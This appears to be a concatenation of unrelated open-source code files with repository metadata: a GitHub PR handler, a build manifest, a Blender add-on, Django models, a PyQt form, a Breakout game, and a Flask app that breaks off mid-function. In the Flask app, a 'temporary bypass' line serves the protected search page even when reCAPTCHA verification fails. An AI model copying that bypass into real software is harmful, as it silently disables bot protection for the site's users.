and event.payload.get('action') == 'opened'
and ReleaseBranchFor(GetBaseBranch(event)) != None)
def handle(self, g, event):
repo = GetRepo(event)
if repo in self.omit_repos:
self.logging.info('Skipping {} because it\'s in omitted repo {}'.format(event, repo))
return
pull_request = GetPullRequest(g, event)
if pull_request is None:
self.logging.warn('Unable to determine PR that created {}'.format(event))
return
commits = pull_request.get_commits()
bad_commits = []
for commit in commits:
message = ParseCommitMessage(commit.commit.message)
if message is None or message.get('type') not in self.allowed_types:
bad_commits.append(commit.commit)
if len(bad_commits) > 0:
pull_request.create_issue_comment(format_message.format(
', '.join(self.allowed_types),
'\n\n'.join(map(lambda c: '{}: {}'.format(c.sha, c.message), bad_commits))
))
ReleaseBranchPullRequestHandler()
|
apache-2.0
| -3,984,927,411,745,407,000 | 40.816327 | 133 | 0.627135 | false |
perwin/imfit
|
distribution_manifest.py
|
1
|
6640
|
# Lists of files for use by make_distributions.py
binary_only_files = """
imfit
imfit-mcmc
makeimage
"""
documentation_files = """
imfit_howto.pdf
imfit_howto.tex
"""
misc_required_files = """
COPYING.txt
DISCLAIMER
README.txt
CHANGELOG.md
cdream/LICENSE_cdream.txt
"""
extras_files = """
imfit_completions.bash
README.md
"""
python_files_for_binary_dist = """
python/imfit.py
python/imfit_funcs.py
"""
# header files in core/
source_header_files_core = """
add_functions
bootstrap_errors
commandline_parser
config_file_parser
convolver
definitions
downsample
estimate_memory
getimages
image_io
mersenne_twister
model_object
mp_enorm
options_base
options_imfit
options_makeimage
options_mcmc
oversampled_region
param_struct
print_results
psf_oversampling_info
sample_configs
setup_model_object
statistics
utilities_pub
"""
# header files in cdream/
source_header_files_mcmc = """
array
dream
dream_params
include/rng/GSLRng
include/rng/GSLStream
include/rng/MKLRng
include/rng/MKLStream
include/rng/Rng
include/rng/RngStream
"""
# the following are C++ files
source_files_core = """
add_functions
bootstrap_errors
commandline_parser
config_file_parser
convolver
downsample
estimate_memory
getimages
image_io
imfit_main
makeimage_main
mcmc_main
mersenne_twister
model_object
mp_enorm
oversampled_region
print_results
psf_oversampling_info
setup_model_object
statistics
utilities
"""
source_files_solvers ="""
levmar_fit
mpfit
diff_evoln_fit
DESolver
nmsimplex_fit
nlopt_fit
dispatch_solver
solver_results
"""
source_files_mcmc ="""
check_outliers
dream
dream_initialize
dream_pars
gelman_rubin
gen_CR
restore_state
"""
source_files_funcobj = """
function_object
func_gaussian
func_exp
func_gen-exp
func_sersic
func_gen-sersic
func_core-sersic
func_broken-exp
func_broken-exp2d
func_king
func_king2
func_moffat
func_flatsky
func_tilted-sky-plane
func_gaussian-ring
func_gaussian-ring2side
func_gaussian-ring-az
func_edge-on-disk_n4762
func_edge-on-disk_n4762v2
func_n4608disk
func_edge-on-ring
func_edge-on-ring2side
func_edge-on-disk
func_brokenexpdisk3d
func_expdisk3d
func_gaussianring3d
func_ferrersbar2d
func_ferrersbar3d
func_flatbar
func_pointsource
helper_funcs
helper_funcs_3d
integrator
psf_interpolators
"""
example_files = """
config_exponential_ic3478_256.dat
config_sersic_ic3478_256.dat
ic3478rss_256.fits
ic3478rss_256_mask.fits
config_makeimage_moffat_psf.dat
psf_moffat_51.fits
README_examples.txt
"""
testing_scripts = """
do_imfit_tests
do_mcmc_tests
do_makeimage_tests
"""
python_files = """
py_startup_test.py
check_speedup.py
compare_fits_files.py
compare_imfit_printouts.py
diff_printouts.py
imfit.py
imfit_funcs.py
"""
# for tests/imfit_reference/
test_files_imfit = """
config_imfit_expdisk32.dat
imfit_config_ic3478_64x64.dat
imfit_config_ic3478_64x64b.dat
imfit_config_ic3478_64x64c.dat
imfit_config_n3073.dat
config_imfit_pgc35772.dat
config_imfit_gauss-oversample-test2.dat
config_imfit_2gauss_small.dat
config_imfit_poisson.dat
config_imfit_flatsky.dat
config_imfit_small-gaussian.dat
config_3x3_flatsky.dat
config_imfit_ptsource.dat
config_imfit_sersictest512_badlimits1.dat
config_imfit_sersictest512_badlimits2.dat
config_imfit_sersictest512_badlimits3.dat
config_imfit_badparamline.dat
imfit_textout1
imfit_textout2
imfit_textout3
imfit_textout3b
imfit_textout3c_tail
imfit_textout3d
imfit_textout3d2
imfit_textout3e
imfit_textout3e2
imfit_textout4
imfit_textout4b
imfit_textout4c
imfit_textout4d
imfit_textout4e
imfit_textout4e2
imfit_textout4e3
imfit_textout5a_tail
imfit_textout5b_tail
imfit_textout5c_tail
imfit_textout5d_tail
imfit_textout5e_tail
imfit_textout6
imfit_textout6b
imfit_textout6c
imfit_textout6d
imfit_textout6e
imfit_textout6f
imfit_textout6g
imfit_textout6h
imfit_textout7a
imfit_textout7b
imfit_textout7c
imfit_textout7d
imfit_textout7e
imfit_textout7f
imfit_textout8a
imfit_textout_bad0
imfit_textout_bad1
imfit_textout_bad2
imfit_textout_bad3
imfit_textout_bad4
imfit_textout_bad5
imfit_textout_bad6
imfit_textout_bad7
imfit_textout_bad8
imfit_textout_badnloptname
"""
# for tests/makeimage_reference/
test_files_makeimage = """
config_biggertest_4c.dat
config_makeimage_gensersic512.dat
config_makeimage_sersic+exp512b.dat
config_makeimage_sersic+exp512.dat
config_makeimage_sersic+exp512_nosize.dat
config_makeimage_gauss-oversample.dat
config_makeimage_gauss-oversample2.dat
config_makeimage_pointsource-oversample.dat
config_makeimage_sersictest512_bad1.dat
config_makeimage_sersictest512_bad2.dat
config_makeimage_sersictest512_bad3.dat
config_makeimage_sersictest512_bad4.dat
config_makeimage_sersictest512_bad5.dat
makeimage_textout0
makeimage_textout1
makeimage_textout2
makeimage_textout3
makeimage_textout4
makeimage_textout5
makeimage_textout5b
makeimage_textout6
makeimage_textout7
makeimage_textout8
makeimage_textout9
makeimage_textout10
makeimage_textout11
makeimage_textout12
makeimage_textout13
makeimage_textout13b
makeimage_textout13c
makeimage_textout14
makeimage_textout15
savefluxes_out.dat
"""
# for tests/imfit-mcmc_reference/
test_files_mcmc = """
config_imfit_faintstar.dat
config_imfit_faintstar_nolims.dat
mcmc_textout1
mcmc_ref1.1.txt_skip3
mcmc_ref2.1.txt_skip3
mcmc_test_short_ref.1.txt_last100
mcmc_ref4.1.txt_skip3
"""
# for tests/
test_files = """
bestfit_params_2gauss_small_tail.dat
bootstrap_output_seed10_tail.dat
bootstrap_output_seed10_2_tail.dat
uniform_image32.fits
testimage_expdisk32.fits
testimage_poisson_lowsn20.fits
testimage_3x3_ones.fits
testimage_3x3_allzeros.fits
testimage_3x3_mask-with-nan.fits
ic3478rss_64x64.fits
ic3478rss_64x64_sigma.fits
ic3478rss_64x64_variance.fits
n3073rss_small.fits
n3073rss_small_cps.fits
n3073rss_small_mask.fits
pgc35772_continuum.fits
pgc35772_mask.fits
faintstar.fits
totalmask_64x64.fits
biggertest_orig.fits
gensersictest_orig.fits
sersic+exp_orig.fits
gensersictest612_conv_cutout512.fits
testimage_2gauss_psf.fits
twogaussian_psf+2osamp_noisy.fits
flatsky_128x128.fits
testimage_3x3_nan.fits
testimage_3x3_onezero.fits
testimage_3x3_ones.fits
mask_for_onezero.fits
oversamp_test4.fits
test_emptyhdu.fits
test_multiextension_hdu0empty.fits
test_table.fits
psf_standard.fits
psf_oversamp.fits
psf_moffat_35.fits
psf_moffat_35_n4699z.fits
psf_moffat_35_oversamp3.fits
psf_moffat_fwhm2.fits
psf_moffat_fwhm2_35x35.fits
test_dump_mcmc2a
test_dump_mcmc2b
oversampled_orig.fits
oversampled2both_orig.fits
oversampled_pointsource.fits
mcmc_data/mcmc_test_short.1.txt
mcmc_data/mcmc_test_short.2.txt
mcmc_data/mcmc_test_short.3.txt
mcmc_data/mcmc_test_short.4.txt
mcmc_data/mcmc_test_short.5.txt
mcmc_data/mcmc_test_short.6.txt
"""
|
gpl-3.0
| 7,749,299,363,004,793,000 | 17.651685 | 49 | 0.815813 | false |
oscurart/BlenderAddons
|
old/oscurart_resize_resolution.py
|
1
|
1753
|
# Compensates the image size when the camera lens is modified.
bl_info = {
"name": "Resize Render Resolution",
"author": "Oscurart",
"version": (1, 0),
"blender": (2, 66, 0),
"location": "Search > Resize Resolution by Camera Angle",
"description": "Resize render dimension by camera angle.",
"warning": "",
"wiki_url": "",
"tracker_url": "",
"category": "Render"}
import bpy
import math
def defResizeResolution(context, anguloInicio, anguloPrimero, resx, resy):
# calcula valores
    anguloActual = math.degrees(anguloInicio / 2)
proportionxy = resx / resy
opuesto = resx / 2
adyacente = opuesto / math.tan(anguloInicio / 2)
newx = (adyacente * math.tan(math.radians(anguloPrimero/2))) * 2
# setea valores
context.scene.render.resolution_x = newx
context.scene.render.resolution_y = newx / proportionxy
context.scene.camera.data.angle = math.radians(anguloPrimero)
class ResizeResolution(bpy.types.Operator):
bl_idname = "scene.resize_resolution"
bl_label = "Resize Resolution by Camera Angle"
bl_options = {"REGISTER", "UNDO"}
anguloPrimero = bpy.props.FloatProperty(name="Field of View", default=math.degrees(.8575), min=.01 )
def execute(self, context):
anguloInicio = context.scene.camera.data.angle
resx = context.scene.render.resolution_x
resy = context.scene.render.resolution_y
print(resx)
defResizeResolution(context, anguloInicio, self.anguloPrimero, resx, resy)
return {'FINISHED'}
def register():
bpy.utils.register_class(ResizeResolution)
def unregister():
bpy.utils.unregister_class(ResizeResolution)
if __name__ == "__main__":
register()
|
gpl-2.0
| 4,949,207,930,317,479,000 | 27.274194 | 104 | 0.661723 | false |
CadeiraCuidadora/UMISS-backend
|
umiss_project/umiss_auth/migrations/0001_initial.py
|
1
|
4571
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-04-21 23:16
from __future__ import unicode_literals
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0008_alter_user_username_max_length'),
]
operations = [
migrations.CreateModel(
name='CustomUser',
fields=[
('id',
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name='ID')),
('password',
models.CharField(
max_length=128,
verbose_name='password')),
('last_login',
models.DateTimeField(
blank=True,
null=True,
verbose_name='last login')),
('is_superuser',
models.BooleanField(
default=False,
help_text='Designates that this user has all permissions without explicitly assigning them.',
verbose_name='superuser status')),
('username',
models.CharField(
error_messages={
'unique': 'A user with that username already exists.'},
help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.',
max_length=150,
unique=True,
validators=[
django.contrib.auth.validators.UnicodeUsernameValidator()],
verbose_name='username')),
('first_name',
models.CharField(
blank=True,
max_length=30,
verbose_name='first name')),
('last_name',
models.CharField(
blank=True,
max_length=30,
verbose_name='last name')),
('email',
models.EmailField(
blank=True,
max_length=254,
verbose_name='email address')),
('is_staff',
models.BooleanField(
default=False,
help_text='Designates whether the user can log into this admin site.',
verbose_name='staff status')),
('is_active',
models.BooleanField(
default=True,
help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.',
verbose_name='active')),
('date_joined',
models.DateTimeField(
default=django.utils.timezone.now,
verbose_name='date joined')),
('user_type',
models.CharField(
choices=[
('patient',
'User Type Pacient'),
('monitor',
'User Type Monitor')],
default='monitor',
max_length=2)),
('groups',
models.ManyToManyField(
blank=True,
help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.',
related_name='user_set',
related_query_name='user',
to='auth.Group',
verbose_name='groups')),
('user_permissions',
models.ManyToManyField(
blank=True,
help_text='Specific permissions for this user.',
related_name='user_set',
related_query_name='user',
to='auth.Permission',
verbose_name='user permissions')),
],
options={
'verbose_name_plural': 'users',
'abstract': False,
'verbose_name': 'user',
},
managers=[
('objects',
django.contrib.auth.models.UserManager()),
],
),
]
|
gpl-3.0
| -2,481,173,413,696,960,500 | 37.737288 | 135 | 0.436228 | false |
Sult/daf
|
apps/corporations/models/corporations.py
|
1
|
1185
|
from django.db import models
#from django.conf import settings
#from config.storage import OverwriteStorage
#from utils.common import icon_size_name
from utils.connection import *
class CorporationApi(models.Model):
""" charactertype apis """
api = models.OneToOneField('apies.Api')
corporationid = models.BigIntegerField()
corporationname = models.CharField(max_length=254)
characterid = models.BigIntegerField()
def __unicode__(self):
return self.corporationname
#class CorporationIcon(models.Model):
#""" images related to characters """
#relation = models.ForeignKey("corporations.Corporation")
#size = models.IntegerField(choices=settings.IMAGE_SIZES)
#typeid = models.IntegerField(unique=True)
#icon = models.ImageField(
#upload_to="images/corporations/",
#storage=OverwriteStorage(),
#blank=True, null=True)
#class Meta:
#unique_together = ["size", "relation"]
#def __unicode__(self):
#return "Corporation Image %s" % icon_size_name(self.size)
##get list of wanted character icon sizes
#@staticmethod
#def icon_sizes():
#return [32, 64, 128, 256]
|
mit
| -2,615,864,952,555,058,000 | 27.902439 | 66 | 0.681857 | false |
yo-alan/personal
|
v/ui_editar.py
|
1
|
11697
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/home/alan/dev/personal/v/ui_editar.ui'
#
# Created: Sat Jan 31 18:27:20 2015
# by: PyQt4 UI code generator 4.9.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_Editar(object):
def setupUi(self, Editar):
Editar.setObjectName(_fromUtf8("Editar"))
Editar.resize(522, 324)
Editar.setModal(True)
self.verticalLayout = QtGui.QVBoxLayout(Editar)
self.verticalLayout.setSizeConstraint(QtGui.QLayout.SetFixedSize)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.groupBox = QtGui.QGroupBox(Editar)
self.groupBox.setObjectName(_fromUtf8("groupBox"))
self.formLayout_3 = QtGui.QFormLayout(self.groupBox)
self.formLayout_3.setFieldGrowthPolicy(QtGui.QFormLayout.AllNonFixedFieldsGrow)
self.formLayout_3.setObjectName(_fromUtf8("formLayout_3"))
self.lblNombre = QtGui.QLabel(self.groupBox)
self.lblNombre.setObjectName(_fromUtf8("lblNombre"))
self.formLayout_3.setWidget(0, QtGui.QFormLayout.LabelRole, self.lblNombre)
self.leNombre = QtGui.QLineEdit(self.groupBox)
self.leNombre.setObjectName(_fromUtf8("leNombre"))
self.formLayout_3.setWidget(0, QtGui.QFormLayout.FieldRole, self.leNombre)
self.lblApellido = QtGui.QLabel(self.groupBox)
self.lblApellido.setObjectName(_fromUtf8("lblApellido"))
self.formLayout_3.setWidget(1, QtGui.QFormLayout.LabelRole, self.lblApellido)
self.leApellido = QtGui.QLineEdit(self.groupBox)
self.leApellido.setObjectName(_fromUtf8("leApellido"))
self.formLayout_3.setWidget(1, QtGui.QFormLayout.FieldRole, self.leApellido)
self.lblFechaNacimiento = QtGui.QLabel(self.groupBox)
self.lblFechaNacimiento.setObjectName(_fromUtf8("lblFechaNacimiento"))
self.formLayout_3.setWidget(2, QtGui.QFormLayout.LabelRole, self.lblFechaNacimiento)
self.deFechaNacimiento = QtGui.QDateEdit(self.groupBox)
self.deFechaNacimiento.setObjectName(_fromUtf8("deFechaNacimiento"))
self.formLayout_3.setWidget(2, QtGui.QFormLayout.FieldRole, self.deFechaNacimiento)
self.lblGenero = QtGui.QLabel(self.groupBox)
self.lblGenero.setObjectName(_fromUtf8("lblGenero"))
self.formLayout_3.setWidget(3, QtGui.QFormLayout.LabelRole, self.lblGenero)
self.cmbGenero = QtGui.QComboBox(self.groupBox)
self.cmbGenero.setObjectName(_fromUtf8("cmbGenero"))
self.cmbGenero.addItem(_fromUtf8(""))
self.cmbGenero.addItem(_fromUtf8(""))
self.formLayout_3.setWidget(3, QtGui.QFormLayout.FieldRole, self.cmbGenero)
self.lblCuil = QtGui.QLabel(self.groupBox)
self.lblCuil.setObjectName(_fromUtf8("lblCuil"))
self.formLayout_3.setWidget(4, QtGui.QFormLayout.LabelRole, self.lblCuil)
self.leCuil = QtGui.QLineEdit(self.groupBox)
self.leCuil.setMaxLength(13)
self.leCuil.setObjectName(_fromUtf8("leCuil"))
self.formLayout_3.setWidget(4, QtGui.QFormLayout.FieldRole, self.leCuil)
self.lblTelefono = QtGui.QLabel(self.groupBox)
self.lblTelefono.setObjectName(_fromUtf8("lblTelefono"))
self.formLayout_3.setWidget(5, QtGui.QFormLayout.LabelRole, self.lblTelefono)
self.leTelefono = QtGui.QLineEdit(self.groupBox)
self.leTelefono.setObjectName(_fromUtf8("leTelefono"))
self.formLayout_3.setWidget(5, QtGui.QFormLayout.FieldRole, self.leTelefono)
self.lblDomicilio = QtGui.QLabel(self.groupBox)
self.lblDomicilio.setObjectName(_fromUtf8("lblDomicilio"))
self.formLayout_3.setWidget(6, QtGui.QFormLayout.LabelRole, self.lblDomicilio)
self.leDomicilio = QtGui.QLineEdit(self.groupBox)
self.leDomicilio.setObjectName(_fromUtf8("leDomicilio"))
self.formLayout_3.setWidget(6, QtGui.QFormLayout.FieldRole, self.leDomicilio)
self.horizontalLayout.addWidget(self.groupBox)
self.groupBox_2 = QtGui.QGroupBox(Editar)
self.groupBox_2.setObjectName(_fromUtf8("groupBox_2"))
self.formLayout_2 = QtGui.QFormLayout(self.groupBox_2)
self.formLayout_2.setFieldGrowthPolicy(QtGui.QFormLayout.AllNonFixedFieldsGrow)
self.formLayout_2.setObjectName(_fromUtf8("formLayout_2"))
self.lblNroLegajo = QtGui.QLabel(self.groupBox_2)
self.lblNroLegajo.setObjectName(_fromUtf8("lblNroLegajo"))
self.formLayout_2.setWidget(1, QtGui.QFormLayout.LabelRole, self.lblNroLegajo)
self.sbNroLegajo = QtGui.QSpinBox(self.groupBox_2)
self.sbNroLegajo.setMinimum(1)
self.sbNroLegajo.setMaximum(1000)
self.sbNroLegajo.setObjectName(_fromUtf8("sbNroLegajo"))
self.formLayout_2.setWidget(1, QtGui.QFormLayout.FieldRole, self.sbNroLegajo)
self.lblFechaIngreso = QtGui.QLabel(self.groupBox_2)
self.lblFechaIngreso.setObjectName(_fromUtf8("lblFechaIngreso"))
self.formLayout_2.setWidget(2, QtGui.QFormLayout.LabelRole, self.lblFechaIngreso)
self.deFechaIngreso = QtGui.QDateEdit(self.groupBox_2)
self.deFechaIngreso.setObjectName(_fromUtf8("deFechaIngreso"))
self.formLayout_2.setWidget(2, QtGui.QFormLayout.FieldRole, self.deFechaIngreso)
self.lblRevista = QtGui.QLabel(self.groupBox_2)
self.lblRevista.setObjectName(_fromUtf8("lblRevista"))
self.formLayout_2.setWidget(3, QtGui.QFormLayout.LabelRole, self.lblRevista)
self.cmbRevista = QtGui.QComboBox(self.groupBox_2)
self.cmbRevista.setObjectName(_fromUtf8("cmbRevista"))
self.cmbRevista.addItem(_fromUtf8(""))
self.cmbRevista.addItem(_fromUtf8(""))
self.cmbRevista.addItem(_fromUtf8(""))
self.cmbRevista.addItem(_fromUtf8(""))
self.cmbRevista.addItem(_fromUtf8(""))
self.formLayout_2.setWidget(3, QtGui.QFormLayout.FieldRole, self.cmbRevista)
self.lblCargo = QtGui.QLabel(self.groupBox_2)
self.lblCargo.setObjectName(_fromUtf8("lblCargo"))
self.formLayout_2.setWidget(4, QtGui.QFormLayout.LabelRole, self.lblCargo)
self.cmbCargo = QtGui.QComboBox(self.groupBox_2)
self.cmbCargo.setObjectName(_fromUtf8("cmbCargo"))
self.cmbCargo.addItem(_fromUtf8(""))
self.cmbCargo.addItem(_fromUtf8(""))
self.cmbCargo.addItem(_fromUtf8(""))
self.cmbCargo.addItem(_fromUtf8(""))
self.cmbCargo.addItem(_fromUtf8(""))
self.formLayout_2.setWidget(4, QtGui.QFormLayout.FieldRole, self.cmbCargo)
self.lblNivel = QtGui.QLabel(self.groupBox_2)
self.lblNivel.setObjectName(_fromUtf8("lblNivel"))
self.formLayout_2.setWidget(6, QtGui.QFormLayout.LabelRole, self.lblNivel)
self.leNivel = QtGui.QLineEdit(self.groupBox_2)
self.leNivel.setObjectName(_fromUtf8("leNivel"))
self.formLayout_2.setWidget(6, QtGui.QFormLayout.FieldRole, self.leNivel)
self.horizontalLayout.addWidget(self.groupBox_2)
self.verticalLayout.addLayout(self.horizontalLayout)
self.buttonBox = QtGui.QDialogButtonBox(Editar)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.Cancel|QtGui.QDialogButtonBox.Ok)
self.buttonBox.setObjectName(_fromUtf8("buttonBox"))
self.verticalLayout.addWidget(self.buttonBox)
self.retranslateUi(Editar)
QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL(_fromUtf8("accepted()")), Editar.accept)
QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL(_fromUtf8("rejected()")), Editar.reject)
QtCore.QMetaObject.connectSlotsByName(Editar)
def retranslateUi(self, Editar):
Editar.setWindowTitle(QtGui.QApplication.translate("Editar", "Editar empleado", None, QtGui.QApplication.UnicodeUTF8))
self.groupBox.setTitle(QtGui.QApplication.translate("Editar", "Datos personales", None, QtGui.QApplication.UnicodeUTF8))
self.lblNombre.setText(QtGui.QApplication.translate("Editar", "Nombre:", None, QtGui.QApplication.UnicodeUTF8))
self.lblApellido.setText(QtGui.QApplication.translate("Editar", "Apellido:", None, QtGui.QApplication.UnicodeUTF8))
self.lblFechaNacimiento.setText(QtGui.QApplication.translate("Editar", "F. Nacimiento:", None, QtGui.QApplication.UnicodeUTF8))
self.deFechaNacimiento.setDisplayFormat(QtGui.QApplication.translate("Editar", "dd/MM/yyyy", None, QtGui.QApplication.UnicodeUTF8))
self.lblGenero.setText(QtGui.QApplication.translate("Editar", "Género:", None, QtGui.QApplication.UnicodeUTF8))
self.cmbGenero.setItemText(0, QtGui.QApplication.translate("Editar", "Femenino", None, QtGui.QApplication.UnicodeUTF8))
self.cmbGenero.setItemText(1, QtGui.QApplication.translate("Editar", "Masculino", None, QtGui.QApplication.UnicodeUTF8))
self.lblCuil.setText(QtGui.QApplication.translate("Editar", "Cuil:", None, QtGui.QApplication.UnicodeUTF8))
self.lblTelefono.setText(QtGui.QApplication.translate("Editar", "Teléfono:", None, QtGui.QApplication.UnicodeUTF8))
self.lblDomicilio.setText(QtGui.QApplication.translate("Editar", "Domicilio:", None, QtGui.QApplication.UnicodeUTF8))
self.groupBox_2.setTitle(QtGui.QApplication.translate("Editar", "Datos laborales", None, QtGui.QApplication.UnicodeUTF8))
self.lblNroLegajo.setText(QtGui.QApplication.translate("Editar", "Nro. Legajo:", None, QtGui.QApplication.UnicodeUTF8))
self.lblFechaIngreso.setText(QtGui.QApplication.translate("Editar", "Ingreso:", None, QtGui.QApplication.UnicodeUTF8))
self.deFechaIngreso.setDisplayFormat(QtGui.QApplication.translate("Editar", "dd/MM/yyyy", None, QtGui.QApplication.UnicodeUTF8))
self.lblRevista.setText(QtGui.QApplication.translate("Editar", "Sit. de Revista:", None, QtGui.QApplication.UnicodeUTF8))
self.cmbRevista.setItemText(0, QtGui.QApplication.translate("Editar", "Comisión", None, QtGui.QApplication.UnicodeUTF8))
self.cmbRevista.setItemText(1, QtGui.QApplication.translate("Editar", "Pasantía", None, QtGui.QApplication.UnicodeUTF8))
self.cmbRevista.setItemText(2, QtGui.QApplication.translate("Editar", "Permanente", None, QtGui.QApplication.UnicodeUTF8))
self.cmbRevista.setItemText(3, QtGui.QApplication.translate("Editar", "Temporaria", None, QtGui.QApplication.UnicodeUTF8))
self.cmbRevista.setItemText(4, QtGui.QApplication.translate("Editar", "Transitoria", None, QtGui.QApplication.UnicodeUTF8))
self.lblCargo.setText(QtGui.QApplication.translate("Editar", "Cargo:", None, QtGui.QApplication.UnicodeUTF8))
self.cmbCargo.setItemText(0, QtGui.QApplication.translate("Editar", "Administrativo", None, QtGui.QApplication.UnicodeUTF8))
self.cmbCargo.setItemText(1, QtGui.QApplication.translate("Editar", "Jerárquico", None, QtGui.QApplication.UnicodeUTF8))
self.cmbCargo.setItemText(2, QtGui.QApplication.translate("Editar", "Obrero", None, QtGui.QApplication.UnicodeUTF8))
self.cmbCargo.setItemText(3, QtGui.QApplication.translate("Editar", "Profesional", None, QtGui.QApplication.UnicodeUTF8))
self.cmbCargo.setItemText(4, QtGui.QApplication.translate("Editar", "Servicio", None, QtGui.QApplication.UnicodeUTF8))
self.lblNivel.setText(QtGui.QApplication.translate("Editar", "Nivel:", None, QtGui.QApplication.UnicodeUTF8))
|
mit
| 4,544,980,707,808,152,000 | 68.595238 | 139 | 0.729644 | false |
felipead/breakout
|
source/breakout/game/GameController.py
|
1
|
4147
|
from OpenGL.GL import *
from OpenGL.GLU import *
import pygame
from pygame.constants import *
from breakout.game.GameEngine import GameEngine
_FRAMES_PER_SECOND = 60
_MOUSE_VISIBLE = True
_CANVAS_WIDTH = 250
_CANVAS_HEIGHT = 300
_DEFAULT_SCREEN_WIDTH = 500
_DEFAULT_SCREEN_HEIGHT = 600
class GameController(object):
def __init__(self):
self.__engine = GameEngine(_CANVAS_WIDTH, _CANVAS_HEIGHT)
self.__screenWidth = _DEFAULT_SCREEN_WIDTH
self.__screenHeight = _DEFAULT_SCREEN_HEIGHT
def run(self):
self.__initialize()
self.__gameLoop()
def __initialize(self):
pygame.init()
pygame.mouse.set_visible(_MOUSE_VISIBLE)
pygame.display.set_mode((self.__screenWidth, self.__screenHeight), OPENGL | DOUBLEBUF)
glClearColor(0.0, 0.0, 0.0, 1.0)
glShadeModel(GL_FLAT)
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glBlendEquation(GL_FUNC_ADD)
self.__handleScreenResizeEvent(self.__screenWidth, self.__screenHeight)
self.__engine.initialize()
def __gameLoop(self):
clock = pygame.time.Clock()
ticks = 0
while True:
for event in pygame.event.get():
self.__handleInputEvent(event)
milliseconds = clock.tick(_FRAMES_PER_SECOND)
ticks += 1
self.__engine.update(milliseconds, ticks)
self.__engine.display(milliseconds, ticks, self.__screenWidth, self.__screenHeight, clock.get_fps())
pygame.display.flip() # swap buffers
def __handleInputEvent(self, event):
if event.type == QUIT:
exit()
elif event.type == VIDEORESIZE:
self.__handleScreenResizeEvent(event.w, event.h)
elif event.type == MOUSEMOTION:
self.__handleMouseMoveEvent(event.pos, event.rel, event.buttons)
elif event.type == MOUSEBUTTONUP:
self.__handleMouseButtonUpEvent(event.button, event.pos)
elif event.type == MOUSEBUTTONDOWN:
self.__handleMouseButtonDownEvent(event.button, event.pos)
elif event.type == KEYUP:
self.__handleKeyUpEvent(event.key, event.mod)
elif event.type == KEYDOWN:
self.__handleKeyDownEvent(event.key, event.mod, event.unicode)
def __handleScreenResizeEvent(self, width, height):
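        # Keep the OpenGL viewport and orthographic projection in sync with the new window size.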
self.__screenWidth = width
self.__screenHeight = height
glViewport(0, 0, width, height)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluOrtho2D(self.__engine.canvas.left, self.__engine.canvas.right,
self.__engine.canvas.bottom, self.__engine.canvas.top)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
def __handleMouseButtonUpEvent(self, button, coordinates):
mappedCoordinates = self.__mapScreenCoordinatesToCanvas(coordinates)
self.__engine.handleMouseButtonUpEvent(button, mappedCoordinates)
def __handleMouseButtonDownEvent(self, button, coordinates):
mappedCoordinates = self.__mapScreenCoordinatesToCanvas(coordinates)
self.__engine.handleMouseButtonDownEvent(button, mappedCoordinates)
def __handleMouseMoveEvent(self, absolute_coordinates, relative_coordinates, buttons):
mapped_absolute_coordinates = self.__mapScreenCoordinatesToCanvas(absolute_coordinates)
self.__engine.handleMouseMoveEvent(mapped_absolute_coordinates, relative_coordinates, buttons)
def __handleKeyUpEvent(self, key, modifiers):
self.__engine.handleKeyUpEvent(key, modifiers)
def __handleKeyDownEvent(self, key, modifiers, char):
self.__engine.handleKeyDownEvent(key, modifiers, char)
def __mapScreenCoordinatesToCanvas(self, coordinates):
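        # Scale window coordinates down to canvas units and flip the y axis (pygame's origin is top-left, the canvas y axis points up).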
horizontalCanvasToScreenRatio = self.__engine.canvas.width / float(self.__screenWidth)
verticalCanvasToScreenRatio = self.__engine.canvas.height / float(self.__screenHeight)
(x, y) = coordinates
x *= horizontalCanvasToScreenRatio
y *= verticalCanvasToScreenRatio
y = self.__engine.canvas.top - y
return x, y
|
gpl-2.0
| 2,273,906,769,018,133,000 | 35.699115 | 112 | 0.661201 | false |
rohitsm/spsoldboys
|
main.py
|
1
|
4255
|
"""`main` is the top level module for your Flask application."""
__author__ = 'rohitsm'
__page__ = 'https://github.com/rohitsm/spsoldboys'
# Python
import urllib2
import json
import sys
import cgi
# Flask
from flask import Flask
from flask import request, redirect, url_for
from flask import render_template
# App Engine
from google.appengine.ext import ndb
import logging
# Application related files
import config
from db import Oldboy
app = Flask(__name__, static_url_path='/static')
# URL format: recaptcha_url? + secret=your_secret & response=response_string&remoteip=user_ip_address'
recaptcha_url = 'https://www.google.com/recaptcha/api/siteverify'
# ReCAPTCHA secret key
recaptcha_secret = config.conf['SHARED_KEY']
def verify_captcha(recaptcha_response):
res = recaptcha_url + \
"?secret=" + recaptcha_secret + \
"&response=" + recaptcha_response
# resp = True|False Type=bool
resp = json.load(urllib2.urlopen(res))["success"]
# print "resp[success] = %r" %resp
return resp
@app.route('/')
def index():
"""Return a friendly HTTP greeting."""
# To add entry to DB, uncomment below line. set_record() reads from csv input.
# num_of_records = Oldboy.set_record()
# print "No of records written = " + str(num_of_records)
# return "helloWorld!"
return render_template('index.html')
@app.route('/search', methods=['GET', 'POST'])
def authentication():
# Verify reCaptcha input and render page correctly if captcha verified
if request.method == 'POST':
if(verify_captcha(request.form['g-recaptcha-response'])):
return render_template('search.html')
        return render_template('search.html')  # Temporary bypass: delete this line so only verified captchas reach the search page
# For GET requests
return redirect(url_for('index'))
# Send data from DB to 'results' page
@app.route('/results', methods=['GET', 'POST'])
def search_request():
